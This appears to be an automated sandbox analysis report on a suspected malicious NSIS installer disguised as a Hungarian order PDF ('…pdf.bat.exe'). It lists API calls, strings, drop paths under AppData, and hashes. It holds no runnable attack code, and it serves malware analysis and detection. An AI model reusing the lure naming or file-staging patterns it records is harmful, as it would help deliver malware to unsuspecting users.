                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                              • GetLastError.KERNEL32 ref: 00405812
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                              • GetLastError.KERNEL32 ref: 00405831
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405DC7
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3), ref: 00405DE2
                                              Strings
                                              • nsa, xrefs: 00405DB6
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00405DA9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa

                                              APIs
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1829
                                              • FreeLibrary.KERNEL32(?), ref: 6FBC18AF
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC18D4
                                                • Part of subcall function 6FBC2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC2387
                                                • Part of subcall function 6FBC2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBC17FA,00000000), ref: 6FBC27F8
                                                • Part of subcall function 6FBC15C6: lstrcpyW.KERNEL32(?,6FBC4020,00000000,6FBC15C3,?,00000000,6FBC1753,00000000), ref: 6FBC15DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000023,00000011,00000002), ref: 0040242F
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 0040246F
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 00402557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp
                                              APIs
                                                • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,00000000,000000F0), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                              • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                              • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                              • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                              • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                              • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                              • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              APIs
                                              • GlobalFree.KERNEL32(00787910), ref: 00401BE7
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 6FBC2B33
                                              • GetLastError.KERNEL32 ref: 6FBC2C3A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 00402557
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              APIs
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                              • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CBA
                                              • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CCA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID:
                                              • API String ID: 3248276644-0
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Create
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileWrite
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileRead
                                              APIs
                                              • VirtualProtect.KERNELBASE(6FBC405C,00000004,00000040,6FBC404C), ref: 6FBC29B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Similarity
                                              • API ID: ProtectVirtual
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Open
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FilePointer
                                              APIs
                                              • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                              • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                              • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                              • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                              • DeleteObject.GDI32(00000000), ref: 00404D5E
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                              • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                              • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                              • GlobalFree.KERNEL32(?), ref: 00405098
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                              • ShowWindow.USER32(?,00000000), ref: 00405237
                                              • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                              • ShowWindow.USER32(00000000), ref: 00405249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                              • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                              • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                              • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                              APIs
                                                • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBC1C6F
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6FBC1CB7
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6FBC1CC1
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1CD4
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1FAA
                                              • lstrcpyW.KERNEL32(?,?), ref: 6FBC2144
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6FBC21B9
                                              • LoadLibraryW.KERNEL32(00000008), ref: 6FBC21CA
                                              • GetProcAddress.KERNEL32(?,?), ref: 6FBC2224
                                              • lstrlenW.KERNEL32(00000808), ref: 6FBC223E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              APIs
                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                              • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                              • GetSysColor.USER32(?), ref: 0040449A
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                              • lstrlenW.KERNEL32(?), ref: 004044BB
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                              • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                              • SendMessageW.USER32(00000000), ref: 0040453D
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                              • SetCursor.USER32(00000000), ref: 004045BC
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
